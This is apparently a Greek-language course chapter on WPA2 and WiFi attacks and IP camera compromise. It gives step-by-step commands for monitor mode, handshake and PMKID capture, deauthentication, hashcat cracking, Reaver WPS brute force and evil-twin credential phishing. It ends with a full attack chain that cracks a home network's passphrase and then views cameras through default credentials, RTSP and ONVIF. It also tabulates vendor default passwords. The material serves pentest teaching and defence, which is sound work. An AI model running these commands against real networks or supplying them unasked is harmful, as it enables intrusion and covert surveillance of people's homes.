WPA2, WiFi και παραβιασμένες κάμερες — πλήρες κεφάλαιο
Τριάντα λεπτά για να καταλάβετε γιατί οι μισές οικιακές κάμερες βίντεο μπορούν να πέσουν με ένα laptop και ένα USB WiFi stick τριάντα ευρώ. Ξεκινάμε από τη φυσική της ραδιοσυχνότητας και ανεβαίνουμε μέχρι την πλήρη αλυσίδα επίθεσης, με τις ακριβείς εντολές, τις άμυνες που δουλεύουν και εκείνες που κάνουν κάποιον να πιστεύει ότι προστατεύεται.
Τι θα ξέρετε να κάνετε
- Να εξηγήσετε, σε έναν πελάτη που πανικοβάλλεται μετά από διαρροή εικόνων, τι έκανε πράγματι ένας hacker για να φτάσει εκεί.
- Να διακρίνετε τις τεχνικές επίθεσης WiFi που δουλεύουν το 2026 από εκείνες που διαβάζετε ακόμα σε άρθρα του 2015.
- Να συστήσετε μια άμυνα που αντέχει τόσο για έναν ιδιώτη όσο και για μια επιχείρηση, με σαφείς απαιτήσεις σε υλικό, ρύθμιση και παρακολούθηση.
Γιατί το WiFi και γιατί οι κάμερες
Σήμερα, το 2026, δύο απλές πραγματικότητες καθιστούν το θέμα επείγον.
Πρώτον, το WiFi είναι παντού και σπάνια σωστά ρυθμισμένο. Στον ιδιώτη, το box του παρόχου βγαίνει από το εργοστάσιο με έναν κωδικό που παράγεται τυχαία, αλλά συχνά με έναν αλγόριθμο που ένας επιτιθέμενος μπορεί να αντιστρέψει (η υπόθεση Livebox / Freebox / SFR box απασχόλησε τα CVE για χρόνια). Στις επιχειρήσεις, μία στις δύο ΜΜΕ χρησιμοποιεί ακόμα ένα κοινό WPA2-PSK μοιρασμένο μεταξύ όλων των υπαλλήλων και των εκτυπωτών.
Έπειτα, οι κάμερες IP είναι παντού και σπάνια ενημερώνονται. Η παγκόσμια αγορά ξεπερνά τις 400 εκατομμύρια ενεργές μονάδες, κυριαρχούμενη από μάρκες για τις οποίες η ασφάλεια είναι απλώς εμπορικό αξεσουάρ. Ένας επιτιθέμενος που εισέρχεται σε ένα δίκτυο WiFi πέφτει σχεδόν πάντα πάνω σε τουλάχιστον μία κάμερα που μπορεί να παραβιαστεί με:
- Τον προεπιλεγμένο κωδικό του κατασκευαστή (
admin:admin,admin:123456,root:vizxv). - Μια web διεπαφή σε καθαρό HTTP χωρίς αλλαγή κωδικού.
- Μια ροή βίντεο RTSP ανοιχτή χωρίς αυθεντικοποίηση στη θύρα 554 ή 8554.
- Ένα API ONVIF κακώς φιλτραρισμένο στη θύρα 80 ή 8080.
- Μια προεπιλεγμένη σύνδεση σε όλες τις διεπαφές, συμπεριλαμβανομένου του WAN αν το box έχει ρυθμιστεί λανθασμένα σε UPnP.
Ο σύνδεσμος ανάμεσα στα δύο είναι άμεσος: αν πέσει το WiFi, η κάμερα ακολουθεί μέσα στα επόμενα λεπτά. Γι' αυτό εξετάζουμε το WiFi πρώτα και τις κάμερες μετά σε αυτό το κεφάλαιο.
Η ραδιοσυχνότητα σε 5 λεπτά
Ένα σήμα WiFi δεν είναι μαγεία, είναι ένα ηλεκτρομαγνητικό κύμα. Τρία μεγέθη αρκούν για να τα καταλάβετε όλα.
Συχνότητα, μήκος κύματος και εμβέλεια
Η συχνότητα είναι ο αριθμός ταλαντώσεων ανά δευτερόλεπτο του σήματος, σε hertz (Hz). Το WiFi χρησιμοποιεί τρεις ζώνες:
| Ζώνη | Ακριβές εύρος | Μήκος κύματος | Τυπική εμβέλεια εσωτερικού χώρου | Τυπική ταχύτητα |
|---|---|---|---|---|
| 2.4 GHz | 2.400 – 2.4835 GHz | 12.5 cm | 45 m με χωρίσματα | 100–400 Mb/s |
| 5 GHz | 5.150 – 5.850 GHz | 6 cm | 15 m με χωρίσματα | 400–1 200 Mb/s |
| 6 GHz (WiFi 6E) | 5.925 – 7.125 GHz | 5 cm | 10 m με χωρίσματα | 1–4 Gb/s |
Κρατήστε τρία πράγματα:
- Η 2.4 GHz φτάνει μακριά επειδή το κύμα είναι μακρύ και περιθλάται καλά γύρω από εμπόδια. Γι' αυτό είναι η προτιμώμενη ζώνη για τις εξωτερικές κάμερες, τα συνδεδεμένα κουδούνια και τους αισθητήρες γκαράζ.
- Η 5 GHz φτάνει λιγότερο μακριά αλλά προσφέρει περισσότερη ταχύτητα και περισσότερα κανάλια — λιγότερες παρεμβολές επίσης, επειδή λιγότερες παλιές συσκευές βρίσκονται εκεί.
- Η 6 GHz είναι η νέα ζώνη, δεσμευμένη για WiFi 6E και WiFi 7, πολύ λιγότερο φορτωμένη αλλά ελάχιστα διαδεδομένη το 2026.
Γιατί η 2.4 GHz είναι κορεσμένη
Η ζώνη 2.4 GHz είναι κοινόχρηστη με τα ασύρματα τηλέφωνα DECT, τους φούρνους μικροκυμάτων (που εκπέμπουν γύρω στα 2.45 GHz), τα τηλεκατευθυνόμενα παιχνίδια, το Bluetooth, το ZigBee και τους φτηνούς πομπούς βίντεο. Όταν καταγράφετε κίνηση σε αυτή τη ζώνη, βλέπετε κυριολεκτικά δεκάδες ανταγωνιστικούς πομπούς. Γι' αυτό επίσης η πραγματική εμβέλεια είναι πολύ κατώτερη από τη θεωρητική: κάθε μετάδοση πρέπει να περιμένει ελεύθερο χρονικό διάστημα.
Κανάλια και εύρος
Κάθε ζώνη χωρίζεται σε κανάλια. Στα 2.4 GHz, υπάρχουν 13 κανάλια (14 στην Ιαπωνία) με απόσταση 5 MHz μεταξύ τους. Αλλά κάθε κανάλι WiFi καταλαμβάνει εύρος 20 MHz, πράγμα που σημαίνει ότι το κανάλι 1 ξεχειλίζει μέχρι το 5, το 6 μέχρι το 10, κ.ο.κ.
Πρακτικό αποτέλεσμα: στα 2.4 GHz, υπάρχουν μόνο τρία μη επικαλυπτόμενα κανάλια — 1, 6 και 11. Ένας επιτιθέμενος που θέλει να καταγράψει κίνηση WiFi ξεκινά πάντα ακούγοντας διαδοχικά αυτά τα τρία κανάλια, κατά προτεραιότητα, επειδή το 90% των access points βρίσκονται εκεί.
Στα 5 GHz έχουμε περισσότερα κανάλια (περίπου 25, ανάλογα με τη χώρα), με εύρη που κυμαίνονται από 20 έως 160 MHz. Είναι άνετο για τα δεδομένα, γι' αυτό επίσης οι στοχευμένες επιθέσεις αφορούν συχνότερα τα 2.4 GHz: η συγκέντρωση στόχων εκεί είναι μεγαλύτερη.
Ισχύς και διάδοση
Η ισχύς εκπομπής μετριέται σε dBm (decibel milliwatt). Ένα box ευρείας κατανάλωσης εκπέμπει περίπου 20 dBm (100 mW), μια κάρτα USB WiFi ανάμεσα σε 15 και 30 dBm (32 έως 1000 mW). Αυτή είναι η ισχύς στην κεραία: αυτό που φτάνει στον δέκτη είναι πολύ ασθενέστερο επειδή η ισχύς μειώνεται με το τετράγωνο της απόστασης.
Για έναν επιτιθέμενο, η πρακτική ερώτηση είναι απλή: με ποια κάρτα WiFi και ποια κεραία, σε ποια απόσταση μπορώ να καταγράψω ένα handshake; Η απάντηση εξαρτάται από την ευαισθησία του δέκτη (μια Alfa AWUS036ACHM δηλώνει ευαισθησία -95 dBm, ένα τσιπ laptop τυπικό κινείται στα -80 dBm). Μια κατευθυντική κεραία κερδίζει εύκολα 10 dB, πράγμα που διπλασιάζει την πραγματική απόσταση.
Κρατήστε ότι με έναν αφιερωμένο USB προσαρμογέα και μια κεραία omni +5 dBi, καταγράφετε ένα handshake στα 30 μέτρα μέσα από τοίχο. Με μια κεραία yagi +15 dBi προσανατολισμένη, φτάνετε στα 200 μέτρα σε ευθεία θέαση.
Wi-Fi 802.11 σε 30 δευτερόλεπτα
Το WiFi ζει πάνω στο πρότυπο IEEE 802.11, που δημοσιεύτηκε το 1997 και αναθεωρείται τακτικά. Οι αναθεωρήσεις που μετρούν για αυτό το κεφάλαιο:
| Πρότυπο | Έτος | Τι αλλάζει | Υποστηριζόμενη κρυπτογράφηση |
|---|---|---|---|
| 802.11b/g | 1999–2003 | Βάση 2.4 GHz | WEP, μετά WPA |
| 802.11n | 2009 | MIMO, ταχύτητες x5 | WPA / WPA2 |
| 802.11ac | 2013 | Μαζικά 5 GHz | Κυρίως WPA2 |
| 802.11ax (WiFi 6) | 2019 | OFDMA, πιο πυκνό | WPA2 ή WPA3 |
| 802.11be (WiFi 7) | 2024 | Multi-link | WPA3 υποχρεωτικό για την πιστοποίηση |
Για έναν επιτιθέμενο, το φυσικό πρότυπο μετρά λίγο. Αυτό που μετρά είναι το πρωτόκολλο ασφαλείας: WEP, WPA, WPA2 ή WPA3.
Το πρωτόκολλο ασφαλείας — από το WEP στο WPA3
WEP (1999 – 2004)
Κρυπτογράφηση RC4 με κοινό κλειδί. Σπάσιμο σε δέκα λεπτά από το 2001, η οριστική ακαδημαϊκή επίδειξη είναι του 2007 (Tews, Weinmann, Pyshkin). Κάθε εγκατάσταση WEP που εξακολουθεί να υπάρχει το 2026 είναι ένα ελάττωμα ρύθμισης προς άμεση διόρθωση, όχι μια επίθεση προς δοκιμή.
WPA (2003)
Επείγουσα απάντηση της WiFi Alliance, προσθέτει το TKIP (κρυπτογράφηση ανά πακέτο με ανανέωση κλειδιού) αλλά διατηρεί το RC4 από κάτω. Επιθέσεις Beck-Tews και Ohigashi-Morii το 2008-2009. Ξεπερασμένο.
WPA2 (2004 – σήμερα)
Περνά στο AES-CCMP ως κρυπτογράφηση. Δύο τρόποι λειτουργίας:
- WPA2-Personal ή WPA2-PSK — μία μοναδική passphrase μοιρασμένη μεταξύ όλων των πελατών του δικτύου. Είναι ο τρόπος για σπίτι και μικρό γραφείο. Είναι επίσης αυτός του 90% των καμερών.
- WPA2-Enterprise — 802.1X, κάθε πελάτης αυθεντικοποιείται με έναν δικό του λογαριασμό και συχνά ένα πιστοποιητικό, μέσω ενός διακομιστή RADIUS. Αυτό βρίσκουμε σε σωστά ρυθμισμένη επιχείρηση.
Το WPA2 δεν είναι σπασμένο στην αρχή του. Αυτό που είναι σπασμένο είναι το WPA2-PSK με αδύναμο κωδικό και μερικά ελαττώματα υλοποίησης (KRACK το 2017, PMKID το 2018).
WPA3 (2018)
Αντικαθιστά το αρχικό handshake με SAE (Simultaneous Authentication of Equals), γνωστό επίσης ως Dragonfly. Το SAE κάνει την αυθεντικοποίηση με κωδικό ανθεκτική σε offline επιθέσεις βασιζόμενη σε ελλειπτικές καμπύλες. Στην πράξη, η σύλληψη ενός handshake WPA3 δεν σας δίνει υλικό για offline σπάσιμο — πρέπει να αλληλεπιδράσετε με το access point για να δοκιμάσετε κάθε υποψήφιο, πράγμα που καθιστά το brute force αδύνατο.
Το 2026, το WPA3 είναι υποχρεωτικό για την πιστοποίηση WiFi 6E και WiFi 7. Αλλά οι routers ευρείας κατανάλωσης παραδίδονται σε λειτουργία «WPA2/WPA3 μικτή» για συμβατότητα, πράγμα που ξανανοίγει την πόρτα μέσω επίθεσης downgrade (δείτε παρακάτω).
WPA2-PSK, πώς λειτουργεί πραγματικά
Ο τρόπος PSK (Pre-Shared Key) είναι αυτός που μας ενδιαφέρει. Η κατανόηση της λειτουργίας του σε βάθος είναι το μισό της δουλειάς ενός pentester WiFi.
Από την passphrase στο κύριο κλειδί (PMK)
Όταν πληκτρολογείτε MonMotDePasse2026! στο box σας, δεν χρησιμοποιείται
όπως έχει. Παράγεται μέσω PBKDF2-HMAC-SHA1, με:
- Την passphrase ως μυστικό.
- Το SSID (το όνομα του δικτύου) ως salt.
- 4096 επαναλήψεις.
- Μια έξοδο 256 bit.
Το αποτέλεσμα ονομάζεται PMK (Pairwise Master Key). Τύπος:
PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 256)
Δύο άμεσες συνέπειες:
- Δύο δίκτυα που έχουν το ίδιο όνομα και τον ίδιο κωδικό έχουν το
ίδιο PMK. Γι' αυτό υπάρχουν οι πίνακες rainbow WPA:
υπολογίζουμε εκ των προτέρων το PMK για ένα δημοφιλές SSID
(
FreeWiFi,linksys,Livebox-XXXX) με εκατομμύρια passphrases, και κερδίζουμε ώρες τη στιγμή της επίθεσης. - Το PBKDF2 με 4096 επαναλήψεις είναι αδύναμο το 2026. Ένα σύγχρονο GPU δοκιμάζει δεκάδες χιλιάδες PMK ανά δευτερόλεπτο. Αυτό που προστατεύει πραγματικά είναι το μήκος και η τυχαιότητα του κωδικού, όχι η συνάρτηση παραγωγής.
Το 4-way handshake
Κάθε φορά που ένας πελάτης συνδέεται στο δίκτυο (τηλέφωνο, κάμερα, laptop), τα δύο άκρα εκτελούν το 4-way handshake. Είναι η καρδιά του πρωτοκόλλου WPA2-PSK. Παράγει ένα μοναδικό PTK (Pairwise Transient Key) για τη συνεδρία, που παράγεται από:
- Το PMK (που κατέχουν ήδη και τα δύο μέρη).
- Μια τυχαιότητα από την πλευρά του access point (ANonce).
- Μια τυχαιότητα από την πλευρά του πελάτη (SNonce).
- Τις διευθύνσεις MAC του πελάτη και του access point.
Τα τέσσερα μηνύματα:
- AP → πελάτης: στέλνει το ANonce.
- Πελάτης → AP: στέλνει το SNonce και ένα MIC (Message Integrity Code) υπολογισμένο με το PTK που παράχθηκε τοπικά. Το MIC αποδεικνύει ότι ο πελάτης γνωρίζει το PMK.
- AP → πελάτης: στέλνει το GTK (κλειδί ομάδας, για το broadcast) κρυπτογραφημένο με το PTK, συν το δικό του MIC.
- Πελάτης → AP: επιβεβαίωση.
Αυτό που καταγράφει ένας επιτιθέμενος που ακούει παθητικά: τα τέσσερα πακέτα. Δεν γνωρίζει το PMK, αλλά γνωρίζει το ANonce, το SNonce, τις MAC, και το MIC του μηνύματος 2.
Κατέχει λοιπόν μια εξίσωση της οποίας η μόνη άγνωστη είναι η passphrase:
MIC = HMAC-SHA1(PTK, message2) PTK = PRF(PMK, ANonce, SNonce, MAC_AP, MAC_client) PMK = PBKDF2(passphrase, SSID, 4096, 256)
Μπορεί λοιπόν να δοκιμάζει passphrases σε βρόχο μέχρι το υπολογισμένο MIC να αντιστοιχεί στο καταγεγραμμένο MIC. Είναι κλασικό offline brute force.
Τι καθιστά το brute force ρεαλιστικό
Δύο συγκεκριμένες μετρήσεις του 2026, σε commodity υλικό:
- Μια RTX 4090 κάνει περίπου 2.100.000 δοκιμές WPA2 ανά δευτερόλεπτο
με το hashcat mode
2500. - Μια ενοικίαση cloud με 8× A100 κάνει 3 φορές περισσότερο.
Σε αυτές τις ταχύτητες:
- Ένας κωδικός 8 χαρακτήρων αλφαριθμητικών πεζών (26⁸ ≈ 208 δισεκατομμύρια πιθανότητες) πέφτει σε 27 ώρες σε μία μόνο 4090.
- Ένας κωδικός 10 μικτών χαρακτήρων κεφαλαίων/πεζών/
ψηφίων (62¹⁰ ≈ 8·10¹⁷) γίνεται απρόσιτος σε καθαρό brute force, αλλά
οι περισσότεροι άνθρωποι επιλέγουν από τα top 100 συνηθισμένα σχήματα
(κοινή λέξη + έτος +
!), πράγμα που μειώνει τον πραγματικό χώρο κατά τάξεις μεγέθους. - Ένας κωδικός 20 τυχαίων χαρακτήρων αντέχει άνετα πέρα από τη χρήσιμη διάρκεια ζωής της εγκατάστασης.
Αυτή η ασυμμετρία είναι που καθιστά το WPA2-PSK ευάλωτο λόγω επιλογής κωδικού, όχι λόγω ελαττώματος πρωτοκόλλου.
Τεχνικές επίθεσης WPA2-PSK
Πέντε κύριες τεχνικές, συν μια έκτη για το WPA3. Όλες απαιτούν μια κάρτα WiFi που υποστηρίζει monitor mode και injection πακέτων. Στην πράξη, το 2026:
- Συνιστάται: Alfa AWUS036ACHM (chipset MediaTek MT7612U), 30 €, συμβατή με Kali εκ κατασκευής.
- Καλή επίσης: Alfa AWUS036ACS (Realtek RTL8811AU), 25 €.
- Προς αποφυγή: οι εσωτερικές κάρτες laptop, που συχνά αρνούνται το injection.
Setup — monitor mode
# Δείτε τις διαθέσιμες διεπαφές WiFi
airmon-ng
# Θέστε το wlan0 σε monitor mode (η διεπαφή ονομάζεται τότε wlan0mon)
airmon-ng start wlan0
# Επιβεβαιώστε ότι το monitor mode είναι ενεργό
iwconfig
# → wlan0mon : mode monitor
Από εκεί και πέρα, όλα τα εργαλεία Aircrack-ng, Kismet, hcxdumptool μπορούν να καταγράφουν ακατέργαστη κίνηση ραδιοσυχνότητας.
Τεχνική 1 — Σύλληψη του 4-way handshake
Είναι η κλασική μέθοδος, δημοσιευμένη ήδη από το 2003, ακόμα η πιο χρησιμοποιούμενη σε pentest WiFi.
Βήμα 1 — εντοπισμός στόχων.
airodump-ng wlan0mon
Η έξοδος απαριθμεί όλα τα access points σε εμβέλεια με το BSSID τους
(διεύθυνση MAC του AP), το κανάλι τους (CH), την κρυπτογράφησή τους (ENC /
CIPHER / AUTH), και το όνομά τους (ESSID). Εντοπίστε τον στόχο και σημειώστε
το BSSID και το κανάλι του.
Βήμα 2 — ακούστε μόνο τον στόχο.
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
Παράγετε το capture-01.cap σε πραγματικό χρόνο. Πρέπει να περιμένετε ένα
πελάτη να συνδεθεί (ή να επανασυνδεθεί) — το handshake συμβαίνει μόνο σε
αυτή τη στιγμή.
Βήμα 3 — επιτάχυνση με ένα deauth (προαιρετικό, δείτε Τεχνική 3).
Βήμα 4 — όταν το airodump εμφανίζει WPA handshake: AA:BB:CC:DD:EE:FF
πάνω δεξιά, έχετε τη σύλληψη.
Βήμα 5 — σπάσιμο offline.
# Μορφή hashcat mode 2500 (WPA-EAPOL-PBKDF2)
hcxpcapngtool -o hash.22000 capture-01.cap
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt \
--optimized-kernel-enable \
-r /usr/share/hashcat/rules/best64.rule
Σε μια σύγχρονη κάρτα, το rockyou.txt (14 εκατομμύρια συνηθισμένες
λέξεις) με το best64.rule (κλασικές παραλλαγές: προσθήκη έτους,
!, αρχικό κεφαλαίο, κ.λπ.) παίρνει 2 έως 5 λεπτά.
Τεχνική 2 — PMKID (Steube, Αύγουστος 2018)
Η συντόμευση που αλλάζει τα πάντα. Ανακαλύφθηκε από τον Jens Steube (δημιουργό του hashcat), εκμεταλλεύεται ένα ελάττωμα υλοποίησης σε ορισμένα firmware access points που διαρρέουν το PMKID (το hash του PMK) στο πρώτο πακέτο σύνδεσης, χωρίς να περιμένουν το πλήρες 4-way handshake.
Αποτέλεσμα: δεν χρειάζεται πια καν να συνδεθεί κάποιος πελάτης. Στέλνουμε ένα ψεύτικο αίτημα σύνδεσης και το access point απαντά με το PMKID.
# Σύλληψη PMKID
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
# Μετατροπή σε μορφή hashcat
hcxpcapngtool -o pmkid.22000 pmkid.pcapng
# Σπάσιμο
hashcat -m 22000 pmkid.22000 rockyou.txt
Δεν διαρρέουν όλα τα AP το PMKID. Αλλά στην πράξη, μεταξύ 30 και 50% των routers ευρείας κατανάλωσης από το 2015 έως το 2020 το κάνουν. Ένα καινούργιο box ελέγχει αυτές τις περιπτώσεις· τα παλιά παραμένουν ευάλωτα και είναι παντού.
Τεχνική 3 — Deauth για εξαναγκασμό της σύλληψης
Το WiFi δεν έχει αυθεντικοποίηση στα πλαίσια διαχείρισής του σε κανονικό WPA2 (είναι προαιρετική από το 802.11w, σπάνια ενεργοποιημένη στην ευρεία κατανάλωση). Ένας επιτιθέμενος μπορεί λοιπόν να στείλει ένα πλαίσιο απο-αυθεντικοποίησης μιμούμενος το BSSID του access point, πράγμα που αναγκάζει τους πελάτες να αποσυνδεθούν και μετά να επανασυνδεθούν — άρα να επαναλάβουν ένα 4-way handshake.
# Απο-αυθεντικοποίηση όλων των πελατών ενός AP
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Απο-αυθεντικοποίηση ενός συγκεκριμένου πελάτη
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
Σε συνδυασμό με το airodump-ng που ακούει παράλληλα, αποκτάτε το
handshake σε λίγα δευτερόλεπτα αντί να περιμένετε έναν πελάτη να
επανασυνδεθεί αυθόρμητα.
Γιατί τα πλαίσια διαχείρισης δεν υπογράφονται από προεπιλογή
Το αρχικό πρότυπο 802.11 (1997) δεν προέβλεψε την υπογραφή των πλαισίων διαχείρισης. Η αναθεώρηση 802.11w (2009) πρόσθεσε το PMF (Protected Management Frames), που καθιστά το deauth αδύνατο να πλαστογραφηθεί. Το πρόβλημα: το PMF είναι προαιρετικό στο WPA2 και υποχρεωτικό μόνο στο WPA3. Τα boxes ευρείας κατανάλωσης το 2026 φτάνουν με το PMF απενεργοποιημένο από προεπιλογή, για συμβατότητα με παλιούς πελάτες. Αυτός είναι ο συμβιβασμός που καθιστά την επίθεση deauth σχεδόν καθολική.
Τεχνική 4 — Evil twin (κακό δίδυμο)
Δεν μπορείτε να σπάσετε έναν ισχυρό κωδικό offline; Κάνετε έναν πελάτη να πιστέψει ότι συνδέεται στο πραγματικό δίκτυο, αλλά συνδέεται σε εσάς.
Κλασική συνταγή:
- Εντοπισμός του SSID στόχου με
airodump-ng. - Δημιουργία τοπικού access point με το ίδιο SSID, ισχυρότερο σε
ισχύ (
hostapd+dnsmasq), σε άλλο κανάλι. - Απο-αυθεντικοποίηση των πελατών του πραγματικού AP ώστε να αναζητήσουν μια εναλλακτική.
- Παρουσίαση σελίδας captive portal που ζητά την passphrase με πρόσχημα «ενημέρωση firmware» ή «επανασύνδεση».
- Λήψη της passphrase σε καθαρό κείμενο.
Το εργαλείο που αυτοματοποιεί όλα αυτά ονομάζεται wifiphisher ή ο διάδοχός του hostapd-mana. Είναι κοινωνική μηχανική + τεχνική, άρα πιο αποτελεσματικό σε περιβάλλον ευρείας κατανάλωσης παρά σε επιχείρηση.
Τεχνική 5 — WPS PIN brute-force (Reaver / Bully)
Το WPS (WiFi Protected Setup) είναι ένας «βολικός» τρόπος όπου πληκτρολογείτε ένα PIN 8 ψηφίων για να συνδέσετε έναν πελάτη. Ελάττωμα σχεδιασμού (2011, Viehböck): το PIN επικυρώνεται σε δύο μισά των 4 ψηφίων, πράγμα που διαιρεί τον χώρο αναζήτησης από 10⁸ σε 2·10⁴. Ένα online brute force παίρνει 4 έως 10 ώρες.
# Reaver εναντίον ενός AP με ενεργό WPS
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
Ορισμένα AP έχουν προσθέσει ένα rate limit ή ένα lockout WPS για
να αντιμετωπίσουν την επίθεση. Το bully διαχειρίζεται καλύτερα αυτές τις σύγχρονες
περιπτώσεις.
Στην πράξη το 2026: το WPS είναι απενεργοποιημένο από προεπιλογή στα πρόσφατα boxes αλλά παραμένει συχνά ενεργοποιημένο στις κάμερες και σε παλιό υλικό. Είναι η βασιλική οδός σε έναν συνδεδεμένο θερμοστάτη ή ένα ασύρματο baby monitor.
Τεχνική 6 — Downgrade από WPA3 σε WPA2
Το WPA3 είναι ανθεκτικό στο offline brute force. Αλλά αν ο router σας είναι σε μικτή λειτουργία WPA2/WPA3, ένας επιτιθέμενος μπορεί να εξαναγκάσει τον πελάτη να χρησιμοποιήσει WPA2, να καταγράψει το handshake και να το σπάσει offline. Είναι η επίθεση Dragonblood (Vanhoef και Ronen, 2019).
Άμυνα: μετάβαση σε καθαρή λειτουργία WPA3 στη ρύθμιση του router. Κάθε συμβατός με WPA3 πελάτης θα διαπραγματευτεί SAE, κανένα downgrade δεν είναι δυνατό.
Γιατί οι κάμερες IoT είναι θησαυρός
Μόλις βρεθεί κάποιος στο δίκτυο, μια κάμερα WiFi είναι σχεδόν πάντα πιο αδύναμη από το box που προστατεύει το δίκτυο. Έξι λόγοι συσσωρεύονται:
1. Προεπιλεγμένος κωδικός ίδιος ανά μοντέλο
Οι κατασκευαστές εξοικονομούν μερικά λεπτά βιομηχανοποιώντας έναν
κωδικό ανά παρτίδα, ή ακόμα και ανά ολόκληρο μοντέλο. Οι δημόσιες
συλλογές συγκεντρώνουν χιλιάδες ζεύγη μάρκα:μοντέλο → login: password — το έργο routersploit ενσωματώνει μεγάλο μέρος τους
απευθείας.
Διάσημα παραδείγματα:
| Κατασκευαστής / μοντέλο | Login / προεπιλεγμένος κωδικός |
|---|---|
| Hikvision (πριν το 2018) | admin / 12345 |
| Dahua (πριν το 2019) | admin / admin |
| Xiongmai (2015-2020) | root / vizxv |
| Foscam (πριν το 2019) | admin / (κενό) |
| Γενικό OEM Amazon | admin / admin |
2. Firmware που δεν ενημερώθηκε ποτέ
Μια κάμερα Amazon 30 € το 2026 τρέχει συχνά με firmware
μεταγλωττισμένο το 2019, με πυρήνα Linux 3.10 και βιβλιοθήκη
openssl του 2016. Τα γνωστά CVE (Heartbleed, Dirty Cow) είναι
άμεσα εκμεταλλεύσιμα.
Ο τελικός χρήστης δεν έχει κανέναν μηχανισμό ειδοποίησης ούτε αυτόματης ενημέρωσης. Η κάμερα τρέχει όπως παραδόθηκε μέχρι να χαλάσει φυσικά.
3. Web διεπαφή σε καθαρό HTTP
Πολλές διεπαφές διαχείρισης καμερών ακούνε σε HTTP (θύρα 80)
χωρίς ανακατεύθυνση HTTPS. Ένας επιτιθέμενος στο ίδιο δίκτυο WiFi βλέπει
τη συνεδρία admin να περνά σε καθαρό κείμενο μέσω ενός απλού ARP spoof με
το bettercap.
4. RTSP χωρίς αυθεντικοποίηση
Το πρωτόκολλο RTSP (Real-Time Streaming Protocol) μεταφέρει το
βίντεο ρεύμα. Σε πολλές κάμερες, η ροή μεταδίδεται στο
rtsp://<ip>:554/live χωρίς κωδικό, στοιχηματίζοντας ότι «κανείς δεν θα
μάθει το URL». Στην πράξη, αρκεί να:
nmap -p 554,8554 --script rtsp-url-brute <ip-camera>
για να λάβετε το βίντεο ζωντανά μέσω VLC.
5. ONVIF κακώς φιλτραρισμένο
Το ONVIF είναι το πρότυπο πρωτόκολλο για τον χειρισμό των καμερών IP: zoom, προσανατολισμός, προρυθμίσεις, snapshot. Βασίζεται σε SOAP πάνω σε HTTP. Πολλές κάμερες εκθέτουν το ONVIF σε δευτερεύουσα θύρα (8080, 8899) χωρίς WS-Security, πράγμα που επιτρέπει σε έναν απλά αυθεντικοποιημένο σε HTTP επιτιθέμενο να χειριστεί την κάμερα.
6. Σύνδεση σε όλες τις διεπαφές + UPnP
Ορισμένες κάμερες ανακοινώνονται μέσω UPnP στο box, το οποίο ανοίγει ευγενικά μια θύρα στο NAT και δημοσιεύει την κάμερα στο internet. Ο ιδιοκτήτης δεν ζήτησε τίποτα, αλλά η κάμερά του είναι τώρα καταχωρισμένη στο Shodan μέσα σε 24 ώρες.
Η περίπτωση Mirai (2016) και οι παραλλαγές της 2020+
Τον Οκτώβριο του 2016, το botnet Mirai παραβίασε πάνω από 600.000 κάμερες και routers IoT σκανάροντας το Internet αναζητώντας ανοιχτές υπηρεσίες Telnet με προεπιλεγμένο κωδικό. Χρησιμοποιήθηκε στη συνέχεια για να κορεστεί το Dyn (πάροχος DNS των Twitter, Netflix, Github) για έξι ώρες.
Οι σύγχρονες παραλλαγές (Mozi, Meris, Fodcha) χρησιμοποιούν την ίδια συνταγή. Το 2026, μεταξύ 15 και 20% των παγκόσμιων καμερών IP ανήκουν σε ενεργό botnet, στην πλειοψηφία τους χωρίς ο ιδιοκτήτης να το αντιλαμβάνεται.
Τυπική αλυσίδα επίθεσης σε κάμερα WiFi
Είστε pentester προσλημένος για να αξιολογήσετε την ασφάλεια του οικογενειακού δικτύου ενός στελέχους. Ακολουθεί η τυπική αλληλουχία.
1. Αναγνώριση RF
airmon-ng start wlan0
airodump-ng -w recon --output-format csv wlan0mon
Αφήνετε να τρέξει 15 λεπτά. Ανακτάτε τη λίστα όλων των ενεργών SSID γύρω από το σπίτι, με τον αριθμό πελατών, την κρυπτογράφηση και το κανάλι.
Εντοπίζετε το MaisonJean σε WPA2-PSK με 6 πελάτες (τρεις από
τους οποίους φαίνεται να είναι κάμερες βάσει του πρόθεματος MAC — τα OUI της
Dahua/Hikvision/Reolink είναι δημόσια).
2. Σύλληψη handshake + σπάσιμο
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon &
aireplay-ng -0 3 -a AA:BB:CC:DD:EE:FF wlan0mon
Handshake συλλήφθηκε. Σπάτε με μια προσαρμοσμένη wordlist: όνομα
του ιδιοκτήτη, ονόματα των παιδιών, έτος γέννησης, με τις κλασικές
μεταλλάξεις. Αυτό κάνει η συνάρτηση -r best64.rule
στο hashcat.
Passphrase που βρέθηκε: Bernadette1978!.
3. Σύνδεση και σκανάρισμα του LAN
# Επαναφορά του wlan0 σε λειτουργία πελάτη
airmon-ng stop wlan0mon
nmcli device wifi connect MaisonJean password 'Bernadette1978!'
# Σκανάρισμα του LAN
nmap -sn 192.168.1.0/24
Ανακαλύπτετε: το box, ένα smartphone, ένα laptop, μια TV, τρεις
κάμερες (192.168.1.20, .21, .22). Δύο απαντούν στο nmap με ένα
banner HTTP που αναφέρει Dahua ή Hikvision.
4. Μετά τη σύνδεση στην κάμερα
# Διεπαφή admin
curl -s http://192.168.1.20/ | grep -i title
# → <title>Web Client v1.0</title> (Dahua)
# Προσπάθεια login default
curl -su admin:admin http://192.168.1.20/cgi-bin/magicBox.cgi?action=getSystemInfo
# Απευθείας ροή RTSP
vlc rtsp://192.168.1.20:554/cam/realmonitor?channel=1&subtype=0
# Snapshot ONVIF
curl -X POST -H "Content-Type: text/xml" \
--data @get-snapshot.xml \
http://192.168.1.20:8080/onvif/Media
Τρεις στις πέντε κάμερες που κάνω pentest ετησίως πέφτουν με
admin:admin ή admin:12345. Μία στις πέντε πέφτει με το PIN WPS
αν η web διαχείριση είναι προστατευμένη. Μία στις πέντε αντιστέκεται — αλλά
το firmware έχει γνωστό CVE.
